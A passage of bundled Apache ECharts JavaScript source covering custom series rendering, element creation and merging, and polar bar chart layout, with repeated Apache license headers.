dataItem) {\n    // dataItem is necessary in log axis.\n    return map(['Radius', 'Angle'], function (dim, dimIdx) {\n        var axis = this['get' + dim + 'Axis']();\n        var val = dataItem[dimIdx];\n        var halfSize = dataSize[dimIdx] / 2;\n        var method = 'dataTo' + dim;\n\n        var result = axis.type === 'category'\n            ? axis.getBandWidth()\n            : Math.abs(axis[method](val - halfSize) - axis[method](val + halfSize));\n\n        if (dim === 'Angle') {\n            result = result * Math.PI / 180;\n        }\n\n        return result;\n\n    }, this);\n}\n\nvar preparePolar = function (coordSys) {\n    var radiusAxis = coordSys.getRadiusAxis();\n    var angleAxis = coordSys.getAngleAxis();\n    var radius = radiusAxis.getExtent();\n    radius[0] > radius[1] && radius.reverse();\n\n    return {\n        coordSys: {\n            type: 'polar',\n            cx: coordSys.cx,\n            cy: coordSys.cy,\n            r: radius[1],\n            r0: radius[0]\n        },\n        api: {\n            coord: bind(function (data) {\n                var radius = radiusAxis.dataToRadius(data[0]);\n                var angle = angleAxis.dataToAngle(data[1]);\n                var coord = coordSys.coordToPoint([radius, angle]);\n                coord.push(radius, angle * Math.PI / 180);\n                return coord;\n            }),\n            size: bind(dataToCoordSize$3, coordSys)\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar prepareCalendar = function (coordSys) {\n    var rect = coordSys.getRect();\n    var rangeInfo = coordSys.getRangeInfo();\n\n    return {\n        coordSys: {\n            type: 'calendar',\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height,\n            cellWidth: coordSys.getCellWidth(),\n            cellHeight: coordSys.getCellHeight(),\n            rangeInfo: {\n                start: rangeInfo.start,\n                end: rangeInfo.end,\n                weeks: rangeInfo.weeks,\n                dayCount: rangeInfo.allDay\n            }\n        },\n        api: {\n            coord: function (data, clamp) {\n                return coordSys.dataToPoint(data, clamp);\n            }\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar CACHED_LABEL_STYLE_PROPERTIES$1 = CACHED_LABEL_STYLE_PROPERTIES;\nvar ITEM_STYLE_NORMAL_PATH = ['itemStyle'];\nvar ITEM_STYLE_EMPHASIS_PATH = ['emphasis', 'itemStyle'];\nvar LABEL_NORMAL = ['label'];\nvar LABEL_EMPHASIS = ['emphasis', 'label'];\n// Use prefix to avoid index to be the same as el.name,\n// which will cause weird udpate animation.\nvar GROUP_DIFF_PREFIX = 'e\\0\\0';\n\n\n/**\n * To reduce total package size of each coordinate systems, the modules `prepareCustom`\n * of each coordinate systems are not required by each coordinate systems directly, but\n * required by the module `custom`.\n *\n * prepareInfoForCustomSeries {Function}: optional\n *     @return {Object} {coordSys: {...}, api: {\n *         coord: function (data, clamp) {}, // return point in global.\n *         size: function (dataSize, dataItem) {} // return size of each axis in coordSys.\n *     }}\n */\nvar prepareCustoms = {\n    cartesian2d: prepareCartesian2d,\n    geo: prepareGeo,\n    singleAxis: prepareSingleAxis,\n    polar: preparePolar,\n    calendar: prepareCalendar\n};\n\n\n// ------\n// Model\n// ------\n\nSeriesModel.extend({\n\n    type: 'series.custom',\n\n    dependencies: ['grid', 'polar', 'geo', 'singleAxis', 'calendar'],\n\n    defaultOption: {\n        coordinateSystem: 'cartesian2d', // Can be set as 'none'\n        zlevel: 0,\n        z: 2,\n        legendHoverLink: true,\n\n        useTransform: true,\n\n        // Custom series will not clip by default.\n        // Some case will use custom series to draw label\n        // For example https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight\n        // Only works on polar and cartesian2d coordinate system.\n        clip: false\n\n        // Cartesian coordinate system\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // Polar coordinate system\n        // polarIndex: 0,\n\n        // Geo coordinate system\n        // geoIndex: 0,\n\n        // label: {}\n        // itemStyle: {}\n    },\n\n    /**\n     * @override\n     */\n    getInitialData: function (option, ecModel) {\n        return createListFromArray(this.getSource(), this);\n    },\n\n    /**\n     * @override\n     */\n    getDataParams: function (dataIndex, dataType, el) {\n        var params = SeriesModel.prototype.getDataParams.apply(this, arguments);\n        el && (params.info = el.info);\n        return params;\n    }\n});\n\n// -----\n// View\n// -----\n\nChart.extend({\n\n    type: 'custom',\n\n    /**\n     * @private\n     * @type {module:echarts/data/List}\n     */\n    _data: null,\n\n    /**\n     * @override\n     */\n    render: function (customSeries, ecModel, api, payload) {\n        var oldData = this._data;\n        var data = customSeries.getData();\n        var group = this.group;\n        var renderItem = makeRenderItem(customSeries, data, ecModel, api);\n\n        // By default, merge mode is applied. In most cases, custom series is\n        // used in the scenario that data amount is not large but graphic elements\n        // is complicated, where merge mode is probably necessary for optimization.\n        // For example, reuse graphic elements and only update the transform when\n        // roam or data zoom according to `actionType`.\n        data.diff(oldData)\n            .add(function (newIdx) {\n                createOrUpdate$1(\n                    null, newIdx, renderItem(newIdx, payload), customSeries, group, data\n                );\n            })\n            .update(function (newIdx, oldIdx) {\n                var el = oldData.getItemGraphicEl(oldIdx);\n                createOrUpdate$1(\n                    el, newIdx, renderItem(newIdx, payload), customSeries, group, data\n                );\n            })\n            .remove(function (oldIdx) {\n                var el = oldData.getItemGraphicEl(oldIdx);\n                el && group.remove(el);\n            })\n            .execute();\n\n        // Do clipping\n        var clipPath = customSeries.get('clip', true)\n            ? createClipPath(customSeries.coordinateSystem, false, customSeries)\n            : null;\n        if (clipPath) {\n            group.setClipPath(clipPath);\n        }\n        else {\n            group.removeClipPath();\n        }\n\n        this._data = data;\n    },\n\n    incrementalPrepareRender: function (customSeries, ecModel, api) {\n        this.group.removeAll();\n        this._data = null;\n    },\n\n    incrementalRender: function (params, customSeries, ecModel, api, payload) {\n        var data = customSeries.getData();\n        var renderItem = makeRenderItem(customSeries, data, ecModel, api);\n        function setIncrementalAndHoverLayer(el) {\n            if (!el.isGroup) {\n                el.incremental = true;\n                el.useHoverLayer = true;\n            }\n        }\n        for (var idx = params.start; idx < params.end; idx++) {\n            var el = createOrUpdate$1(null, idx, renderItem(idx, payload), customSeries, this.group, data);\n            el.traverse(setIncrementalAndHoverLayer);\n        }\n    },\n\n    /**\n     * @override\n     */\n    dispose: noop,\n\n    /**\n     * @override\n     */\n    filterForExposedEvent: function (eventType, query, targetEl, packedEvent) {\n        var elementName = query.element;\n        if (elementName == null || targetEl.name === elementName) {\n            return true;\n        }\n\n        // Enable to give a name on a group made by `renderItem`, and listen\n        // events that triggerd by its descendents.\n        while ((targetEl = targetEl.parent) && targetEl !== this.group) {\n            if (targetEl.name === elementName) {\n                return true;\n            }\n        }\n\n        return false;\n    }\n});\n\n\nfunction createEl(elOption) {\n    var graphicType = elOption.type;\n    var el;\n\n    // Those graphic elements are not shapes. They should not be\n    // overwritten by users, so do them first.\n    if (graphicType === 'path') {\n        var shape = elOption.shape;\n        // Using pathRect brings convenience to users sacle svg path.\n        var pathRect = (shape.width != null && shape.height != null)\n            ? {\n                x: shape.x || 0,\n                y: shape.y || 0,\n                width: shape.width,\n                height: shape.height\n            }\n            : null;\n        var pathData = getPathData(shape);\n        // Path is also used for icon, so layout 'center' by default.\n        el = makePath(pathData, null, pathRect, shape.layout || 'center');\n        el.__customPathData = pathData;\n    }\n    else if (graphicType === 'image') {\n        el = new ZImage({});\n        el.__customImagePath = elOption.style.image;\n    }\n    else if (graphicType === 'text') {\n        el = new Text({});\n        el.__customText = elOption.style.text;\n    }\n    else if (graphicType === 'group') {\n        el = new Group();\n    }\n    else if (graphicType === 'compoundPath') {\n        throw new Error('\"compoundPath\" is not supported yet.');\n    }\n    else {\n        var Clz = getShapeClass(graphicType);\n\n        if (__DEV__) {\n            assert$1(Clz, 'graphic type \"' + graphicType + '\" can not be found.');\n        }\n\n        el = new Clz();\n    }\n\n    el.__customGraphicType = graphicType;\n    el.name = elOption.name;\n\n    return el;\n}\n\nfunction updateEl(el, dataIndex, elOption, animatableModel, data, isInit, isRoot) {\n    var transitionProps = {};\n    var elOptionStyle = elOption.style || {};\n\n    elOption.shape && (transitionProps.shape = clone(elOption.shape));\n    elOption.position && (transitionProps.position = elOption.position.slice());\n    elOption.scale && (transitionProps.scale = elOption.scale.slice());\n    elOption.origin && (transitionProps.origin = elOption.origin.slice());\n    elOption.rotation && (transitionProps.rotation = elOption.rotation);\n\n    if (el.type === 'image' && elOption.style) {\n        var targetStyle = transitionProps.style = {};\n        each$1(['x', 'y', 'width', 'height'], function (prop) {\n            prepareStyleTransition(prop, targetStyle, elOptionStyle, el.style, isInit);\n        });\n    }\n\n    if (el.type === 'text' && elOption.style) {\n        var targetStyle = transitionProps.style = {};\n        each$1(['x', 'y'], function (prop) {\n            prepareStyleTransition(prop, targetStyle, elOptionStyle, el.style, isInit);\n        });\n        // Compatible with previous: both support\n        // textFill and fill, textStroke and stroke in 'text' element.\n        !elOptionStyle.hasOwnProperty('textFill') && elOptionStyle.fill && (\n            elOptionStyle.textFill = elOptionStyle.fill\n        );\n        !elOptionStyle.hasOwnProperty('textStroke') && elOptionStyle.stroke && (\n            elOptionStyle.textStroke = elOptionStyle.stroke\n        );\n    }\n\n    if (el.type !== 'group') {\n        el.useStyle(elOptionStyle);\n\n        // Init animation.\n        if (isInit) {\n            el.style.opacity = 0;\n            var targetOpacity = elOptionStyle.opacity;\n            targetOpacity == null && (targetOpacity = 1);\n            initProps(el, {style: {opacity: targetOpacity}}, animatableModel, dataIndex);\n        }\n    }\n\n    if (isInit) {\n        el.attr(transitionProps);\n    }\n    else {\n        updateProps(el, transitionProps, animatableModel, dataIndex);\n    }\n\n    // Merge by default.\n    // z2 must not be null/undefined, otherwise sort error may occur.\n    elOption.hasOwnProperty('z2') && el.attr('z2', elOption.z2 || 0);\n    elOption.hasOwnProperty('silent') && el.attr('silent', elOption.silent);\n    elOption.hasOwnProperty('invisible') && el.attr('invisible', elOption.invisible);\n    elOption.hasOwnProperty('ignore') && el.attr('ignore', elOption.ignore);\n    // `elOption.info` enables user to mount some info on\n    // elements and use them in event handlers.\n    // Update them only when user specified, otherwise, remain.\n    elOption.hasOwnProperty('info') && el.attr('info', elOption.info);\n\n    // If `elOption.styleEmphasis` is `false`, remove hover style. The\n    // logic is ensured by `graphicUtil.setElementHoverStyle`.\n    var styleEmphasis = elOption.styleEmphasis;\n    // hoverStyle should always be set here, because if the hover style\n    // may already be changed, where the inner cache should be reset.\n    setElementHoverStyle(el, styleEmphasis);\n    if (isRoot) {\n        setAsHighDownDispatcher(el, styleEmphasis !== false);\n    }\n}\n\nfunction prepareStyleTransition(prop, targetStyle, elOptionStyle, oldElStyle, isInit) {\n    if (elOptionStyle[prop] != null && !isInit) {\n        targetStyle[prop] = elOptionStyle[prop];\n        elOptionStyle[prop] = oldElStyle[prop];\n    }\n}\n\nfunction makeRenderItem(customSeries, data, ecModel, api) {\n    var renderItem = customSeries.get('renderItem');\n    var coordSys = customSeries.coordinateSystem;\n    var prepareResult = {};\n\n    if (coordSys) {\n        if (__DEV__) {\n            assert$1(renderItem, 'series.render is required.');\n            assert$1(\n                coordSys.prepareCustoms || prepareCustoms[coordSys.type],\n                'This coordSys does not support custom series.'\n            );\n        }\n\n        prepareResult = coordSys.prepareCustoms\n            ? coordSys.prepareCustoms()\n            : prepareCustoms[coordSys.type](coordSys);\n    }\n\n    var userAPI = defaults({\n        getWidth: api.getWidth,\n        getHeight: api.getHeight,\n        getZr: api.getZr,\n        getDevicePixelRatio: api.getDevicePixelRatio,\n        value: value,\n        style: style,\n        styleEmphasis: styleEmphasis,\n        visual: visual,\n        barLayout: barLayout,\n        currentSeriesIndices: currentSeriesIndices,\n        font: font\n    }, prepareResult.api || {});\n\n    var userParams = {\n        // The life cycle of context: current round of rendering.\n        // The global life cycle is probably not necessary, because\n        // user can store global status by themselves.\n        context: {},\n        seriesId: customSeries.id,\n        seriesName: customSeries.name,\n        seriesIndex: customSeries.seriesIndex,\n        coordSys: prepareResult.coordSys,\n        dataInsideLength: data.count(),\n        encode: wrapEncodeDef(customSeries.getData())\n    };\n\n    // Do not support call `api` asynchronously without dataIndexInside input.\n    var currDataIndexInside;\n    var currDirty = true;\n    var currItemModel;\n    var currLabelNormalModel;\n    var currLabelEmphasisModel;\n    var currVisualColor;\n\n    return function (dataIndexInside, payload) {\n        currDataIndexInside = dataIndexInside;\n        currDirty = true;\n\n        return renderItem && renderItem(\n            defaults({\n                dataIndexInside: dataIndexInside,\n                dataIndex: data.getRawIndex(dataIndexInside),\n                // Can be used for optimization when zoom or roam.\n                actionType: payload ? payload.type : null\n            }, userParams),\n            userAPI\n        );\n    };\n\n    // Do not update cache until api called.\n    function updateCache(dataIndexInside) {\n        dataIndexInside == null && (dataIndexInside = currDataIndexInside);\n        if (currDirty) {\n            currItemModel = data.getItemModel(dataIndexInside);\n            currLabelNormalModel = currItemModel.getModel(LABEL_NORMAL);\n            currLabelEmphasisModel = currItemModel.getModel(LABEL_EMPHASIS);\n            currVisualColor = data.getItemVisual(dataIndexInside, 'color');\n\n            currDirty = false;\n        }\n    }\n\n    /**\n     * @public\n     * @param {number|string} dim\n     * @param {number} [dataIndexInside=currDataIndexInside]\n     * @return {number|string} value\n     */\n    function value(dim, dataIndexInside) {\n        dataIndexInside == null && (dataIndexInside = currDataIndexInside);\n        return data.get(data.getDimension(dim || 0), dataIndexInside);\n    }\n\n    /**\n     * By default, `visual` is applied to style (to support visualMap).\n     * `visual.color` is applied at `fill`. If user want apply visual.color on `stroke`,\n     * it can be implemented as:\n     * `api.style({stroke: api.visual('color'), fill: null})`;\n     * @public\n     * @param {Object} [extra]\n     * @param {number} [dataIndexInside=currDataIndexInside]\n     */\n    function style(extra, dataIndexInside) {\n        dataIndexInside == null && (dataIndexInside = currDataIndexInside);\n        updateCache(dataIndexInside);\n\n        var itemStyle = currItemModel.getModel(ITEM_STYLE_NORMAL_PATH).getItemStyle();\n\n        currVisualColor != null && (itemStyle.fill = currVisualColor);\n        var opacity = data.getItemVisual(dataIndexInside, 'opacity');\n        opacity != null && (itemStyle.opacity = opacity);\n\n        var labelModel = extra\n            ? applyExtraBefore(extra, currLabelNormalModel)\n            : currLabelNormalModel;\n\n        setTextStyle(itemStyle, labelModel, null, {\n            autoColor: currVisualColor,\n            isRectText: true\n        });\n\n        itemStyle.text = labelModel.getShallow('show')\n            ? retrieve2(\n                customSeries.getFormattedLabel(dataIndexInside, 'normal'),\n                getDefaultLabel(data, dataIndexInside)\n            )\n            : null;\n\n        extra && applyExtraAfter(itemStyle, extra);\n\n        return itemStyle;\n    }\n\n    /**\n     * @public\n     * @param {Object} [extra]\n     * @param {number} [dataIndexInside=currDataIndexInside]\n     */\n    function styleEmphasis(extra, dataIndexInside) {\n        dataIndexInside == null && (dataIndexInside = currDataIndexInside);\n        updateCache(dataIndexInside);\n\n        var itemStyle = currItemModel.getModel(ITEM_STYLE_EMPHASIS_PATH).getItemStyle();\n\n        var labelModel = extra\n            ? applyExtraBefore(extra, currLabelEmphasisModel)\n            : currLabelEmphasisModel;\n\n        setTextStyle(itemStyle, labelModel, null, {\n            isRectText: true\n        }, true);\n\n        itemStyle.text = labelModel.getShallow('show')\n            ? retrieve3(\n                customSeries.getFormattedLabel(dataIndexInside, 'emphasis'),\n                customSeries.getFormattedLabel(dataIndexInside, 'normal'),\n                getDefaultLabel(data, dataIndexInside)\n            )\n            : null;\n\n        extra && applyExtraAfter(itemStyle, extra);\n\n        return itemStyle;\n    }\n\n    /**\n     * @public\n     * @param {string} visualType\n     * @param {number} [dataIndexInside=currDataIndexInside]\n     */\n    function visual(visualType, dataIndexInside) {\n        dataIndexInside == null && (dataIndexInside = currDataIndexInside);\n        return data.getItemVisual(dataIndexInside, visualType);\n    }\n\n    /**\n     * @public\n     * @param {number} opt.count Positive interger.\n     * @param {number} [opt.barWidth]\n     * @param {number} [opt.barMaxWidth]\n     * @param {number} [opt.barMinWidth]\n     * @param {number} [opt.barGap]\n     * @param {number} [opt.barCategoryGap]\n     * @return {Object} {width, offset, offsetCenter} is not support, return undefined.\n     */\n    function barLayout(opt) {\n        if (coordSys.getBaseAxis) {\n            var baseAxis = coordSys.getBaseAxis();\n            return getLayoutOnAxis(defaults({axis: baseAxis}, opt), api);\n        }\n    }\n\n    /**\n     * @public\n     * @return {Array.<number>}\n     */\n    function currentSeriesIndices() {\n        return ecModel.getCurrentSeriesIndices();\n    }\n\n    /**\n     * @public\n     * @param {Object} opt\n     * @param {string} [opt.fontStyle]\n     * @param {number} [opt.fontWeight]\n     * @param {number} [opt.fontSize]\n     * @param {string} [opt.fontFamily]\n     * @return {string} font string\n     */\n    function font(opt) {\n        return getFont(opt, ecModel);\n    }\n}\n\nfunction wrapEncodeDef(data) {\n    var encodeDef = {};\n    each$1(data.dimensions, function (dimName, dataDimIndex) {\n        var dimInfo = data.getDimensionInfo(dimName);\n        if (!dimInfo.isExtraCoord) {\n            var coordDim = dimInfo.coordDim;\n            var dataDims = encodeDef[coordDim] = encodeDef[coordDim] || [];\n            dataDims[dimInfo.coordDimIndex] = dataDimIndex;\n        }\n    });\n    return encodeDef;\n}\n\nfunction createOrUpdate$1(el, dataIndex, elOption, animatableModel, group, data) {\n    el = doCreateOrUpdate(el, dataIndex, elOption, animatableModel, group, data, true);\n    el && data.setItemGraphicEl(dataIndex, el);\n\n    return el;\n}\n\nfunction doCreateOrUpdate(el, dataIndex, elOption, animatableModel, group, data, isRoot) {\n\n    // [Rule]\n    // By default, follow merge mode.\n    //     (It probably brings benifit for performance in some cases of large data, where\n    //     user program can be optimized to that only updated props needed to be re-calculated,\n    //     or according to `actionType` some calculation can be skipped.)\n    // If `renderItem` returns `null`/`undefined`/`false`, remove the previous el if existing.\n    //     (It seems that violate the \"merge\" principle, but most of users probably intuitively\n    //     regard \"return;\" as \"show nothing element whatever\", so make a exception to meet the\n    //     most cases.)\n\n    var simplyRemove = !elOption; // `null`/`undefined`/`false`\n    elOption = elOption || {};\n    var elOptionType = elOption.type;\n    var elOptionShape = elOption.shape;\n    var elOptionStyle = elOption.style;\n\n    if (el && (\n        simplyRemove\n        // || elOption.$merge === false\n        // If `elOptionType` is `null`, follow the merge principle.\n        || (elOptionType != null\n            && elOptionType !== el.__customGraphicType\n        )\n        || (elOptionType === 'path'\n            && hasOwnPathData(elOptionShape) && getPathData(elOptionShape) !== el.__customPathData\n        )\n        || (elOptionType === 'image'\n            && hasOwn(elOptionStyle, 'image') && elOptionStyle.image !== el.__customImagePath\n        )\n        // FIXME test and remove this restriction?\n        || (elOptionType === 'text'\n            && hasOwn(elOptionShape, 'text') && elOptionStyle.text !== el.__customText\n        )\n    )) {\n        group.remove(el);\n        el = null;\n    }\n\n    // `elOption.type` is undefined when `renderItem` returns nothing.\n    if (simplyRemove) {\n        return;\n    }\n\n    var isInit = !el;\n    !el && (el = createEl(elOption));\n    updateEl(el, dataIndex, elOption, animatableModel, data, isInit, isRoot);\n\n    if (elOptionType === 'group') {\n        mergeChildren(el, dataIndex, elOption, animatableModel, data);\n    }\n\n    // Always add whatever already added to ensure sequence.\n    group.add(el);\n\n    return el;\n}\n\n// Usage:\n// (1) By default, `elOption.$mergeChildren` is `'byIndex'`, which indicates that\n//     the existing children will not be removed, and enables the feature that\n//     update some of the props of some of the children simply by construct\n//     the returned children of `renderItem` like:\n//     `var children = group.children = []; children[3] = {opacity: 0.5};`\n// (2) If `elOption.$mergeChildren` is `'byName'`, add/update/remove children\n//     by child.name. But that might be lower performance.\n// (3) If `elOption.$mergeChildren` is `false`, the existing children will be\n//     replaced totally.\n// (4) If `!elOption.children`, following the \"merge\" principle, nothing will happen.\n//\n// For implementation simpleness, do not provide a direct way to remove sinlge\n// child (otherwise the total indicies of the children array have to be modified).\n// User can remove a single child by set its `ignore` as `true` or replace\n// it by another element, where its `$merge` can be set as `true` if necessary.\nfunction mergeChildren(el, dataIndex, elOption, animatableModel, data) {\n    var newChildren = elOption.children;\n    var newLen = newChildren ? newChildren.length : 0;\n    var mergeChildren = elOption.$mergeChildren;\n    // `diffChildrenByName` has been deprecated.\n    var byName = mergeChildren === 'byName' || elOption.diffChildrenByName;\n    var notMerge = mergeChildren === false;\n\n    // For better performance on roam update, only enter if necessary.\n    if (!newLen && !byName && !notMerge) {\n        return;\n    }\n\n    if (byName) {\n        diffGroupChildren({\n            oldChildren: el.children() || [],\n            newChildren: newChildren || [],\n            dataIndex: dataIndex,\n            animatableModel: animatableModel,\n            group: el,\n            data: data\n        });\n        return;\n    }\n\n    notMerge && el.removeAll();\n\n    // Mapping children of a group simply by index, which\n    // might be better performance.\n    var index = 0;\n    for (; index < newLen; index++) {\n        newChildren[index] && doCreateOrUpdate(\n            el.childAt(index),\n            dataIndex,\n            newChildren[index],\n            animatableModel,\n            el,\n            data\n        );\n    }\n    if (__DEV__) {\n        assert$1(\n            !notMerge || el.childCount() === index,\n            'MUST NOT contain empty item in children array when `group.$mergeChildren` is `false`.'\n        );\n    }\n}\n\nfunction diffGroupChildren(context) {\n    (new DataDiffer(\n        context.oldChildren,\n        context.newChildren,\n        getKey,\n        getKey,\n        context\n    ))\n        .add(processAddUpdate)\n        .update(processAddUpdate)\n        .remove(processRemove)\n        .execute();\n}\n\nfunction getKey(item, idx) {\n    var name = item && item.name;\n    return name != null ? name : GROUP_DIFF_PREFIX + idx;\n}\n\nfunction processAddUpdate(newIndex, oldIndex) {\n    var context = this.context;\n    var childOption = newIndex != null ? context.newChildren[newIndex] : null;\n    var child = oldIndex != null ? context.oldChildren[oldIndex] : null;\n\n    doCreateOrUpdate(\n        child,\n        context.dataIndex,\n        childOption,\n        context.animatableModel,\n        context.group,\n        context.data\n    );\n}\n\n// `graphic#applyDefaultTextStyle` will cache\n// textFill, textStroke, textStrokeWidth.\n// We have to do this trick.\nfunction applyExtraBefore(extra, model) {\n    var dummyModel = new Model({}, model);\n    each$1(CACHED_LABEL_STYLE_PROPERTIES$1, function (stylePropName, modelPropName) {\n        if (extra.hasOwnProperty(stylePropName)) {\n            dummyModel.option[modelPropName] = extra[stylePropName];\n        }\n    });\n    return dummyModel;\n}\n\nfunction applyExtraAfter(itemStyle, extra) {\n    for (var key in extra) {\n        if (extra.hasOwnProperty(key)\n            || !CACHED_LABEL_STYLE_PROPERTIES$1.hasOwnProperty(key)\n        ) {\n            itemStyle[key] = extra[key];\n        }\n    }\n}\n\nfunction processRemove(oldIndex) {\n    var context = this.context;\n    var child = context.oldChildren[oldIndex];\n    child && context.group.remove(child);\n}\n\nfunction getPathData(shape) {\n    // \"d\" follows the SVG convention.\n    return shape && (shape.pathData || shape.d);\n}\n\nfunction hasOwnPathData(shape) {\n    return shape && (shape.hasOwnProperty('pathData') || shape.hasOwnProperty('d'));\n}\n\nfunction hasOwn(host, prop) {\n    return host && host.hasOwnProperty(prop);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction getSeriesStackId$1(seriesModel) {\n    return seriesModel.get('stack')\n        || '__ec_stack_' + seriesModel.seriesIndex;\n}\n\nfunction getAxisKey$1(polar, axis) {\n    return axis.dim + polar.model.componentIndex;\n}\n\n/**\n * @param {string} seriesType\n * @param {module:echarts/model/Global} ecModel\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction barLayoutPolar(seriesType, ecModel, api) {\n\n    var lastStackCoords = {};\n\n    var barWidthAndOffset = calRadialBar(\n        filter(\n            ecModel.getSeriesByType(seriesType),\n            function (seriesModel) {\n                return !ecModel.isSeriesFiltered(seriesModel)\n                    && seriesModel.coordinateSystem\n                    && seriesModel.coordinateSystem.type === 'polar';\n            }\n        )\n    );\n\n    ecModel.eachSeriesByType(seriesType, function (seriesModel) {\n\n        // Check series coordinate, do layout for polar only\n        if (seriesModel.coordinateSystem.type !== 'polar') {\n            return;\n        }\n\n        var data = seriesModel.getData();\n        var polar = seriesModel.coordinateSystem;\n        var baseAxis = polar.getBaseAxis();\n        var axisKey = getAxisKey$1(polar, baseAxis);\n\n        var stackId = getSeriesStackId$1(seriesModel);\n        var columnLayoutInfo = barWidthAndOffset[axisKey][stackId];\n        var columnOffset = columnLayoutInfo.offset;\n        var columnWidth = columnLayoutInfo.width;\n        var valueAxis = polar.getOtherAxis(baseAxis);\n\n        var cx = seriesModel.coordinateSystem.cx;\n        var cy = seriesModel.coordinateSystem.cy;\n\n        var barMinHeight = seriesModel.get('barMinHeight') || 0;\n        var barMinAngle = seriesModel.get('barMinAngle') || 0;\n\n        lastStackCoords[stackId] = lastStackCoords[stackId] || [];\n\n        var valueDim = data.mapDimension(valueAxis.dim);\n        var baseDim = data.mapDimension(baseAxis.dim);\n        var stacked = isDimensionStacked(data, valueDim /*, baseDim*/);\n        var clampLayout = baseAxis.dim !== 'radius'\n            || !seriesModel.get('roundCap', true);\n\n        var valueAxisStart = valueAxis.getExtent()[0];\n\n        for (var idx = 0, len = data.count(); idx < len; idx++) {\n            var value = data.get(valueDim, idx);\n            var baseValue = data.get(baseDim, idx);\n\n            var sign = value >= 0 ? 'p' : 'n';\n            var baseCoord = valueAxisStart;\n\n            // Because of the barMinHeight, we can not use the value in\n            // stackResultDimension directly.\n            // Only ordinal axis can be stacked.\n            if (stacked) {\n                if (!lastStackCoords[stackId][baseValue]) {\n                    lastStackCoords[stackId][baseValue] = {\n                        p: valueAxisStart, // Positive stack\n                        n: valueAxisStart  // Negative stack\n                    };\n                }\n                // Should also consider #4243\n                baseCoord = lastStackCoords[stackId][baseValue][sign];\n            }\n\n            var r0;\n            var r;\n            var startAngle;\n            var endAngle;\n\n            // radial sector\n            if (valueAxis.dim === 'radius') {\n                var radiusSpan = valueAxis.dataToRadius(value) - valueAxisStart;\n                var angle = baseAxis.dataToAngle(baseValue);\n\n                if (Math.abs(radiusSpan) < barMinHeight) {\n                    radiusSpan = (radiusSpan < 0 ? -1 : 1) * barMinHeight;\n                }\n\n                r0 = baseCoord;\n                r = baseCoord + radiusSpan;\n                startAngle = angle - columnOffset;\n                endAngle = startAngle - columnWidth;\n\n                stacked && (lastStackCoords[stackId][baseValue][sign] = r);\n            }\n            // tangential sector\n            else {\n                var angleSpan = valueAxis.dataToAngle(value, clampLayout) - valueAxisStart;\n                var radius = baseAxis.dataToRadius(baseValue);\n\n                if (Math.abs(angleSpan) < barMinAngle) {\n                    angleSpan = (angleSpan < 0 ? -1 : 1) * barMinAngle;\n                }\n\n                r0 = radius + columnOffset;\n                r = r0 + columnWidth;\n                startAngle = baseCoord;\n                endAngle = baseCoord + angleSpan;\n\n                // if the previous stack is at the end of the ring,\n                // add a round to differentiate it from origin\n                // var extent = angleAxis.getExtent();\n                // var stackCoord = angle;\n                // if (stackCoord === extent[0] && value > 0) {\n                //     stackCoord = extent[1];\n                // }\n                // else if (stackCoord === extent[1] && value < 0) {\n                //     stackCoord = extent[0];\n                // }\n                stacked && (lastStackCoords[stackId][baseValue][sign] = endAngle);\n            }\n\n            data.setItemLayout(idx, {\n                cx: cx,\n                cy: cy,\n                r0: r0,\n                r: r,\n                // Consider that positive angle is anti-clockwise,\n                // while positive radian of sector is clockwise\n                startAngle: -startAngle * Math.PI / 180,\n                endAngle: -endAngle * Math.PI / 180\n            });\n\n        }\n\n    }, this);\n\n}\n\n/**\n * Calculate bar width and offset for radial bar charts\n */\nfunction calRadialBar(barSeries, api) {\n    // Columns info on each category axis. Key is polar name\n    var columnsMap = {};\n\n    each$1(barSeries, function (seriesModel, idx) {\n        var data = seriesModel.getData();\n        var polar = seriesModel.coordinateSystem;\n\n        var baseAxis = polar.getBaseAxis();\n        var axisKey = getAxisKey$1(polar, baseAxis);\n\n        var axisExtent = 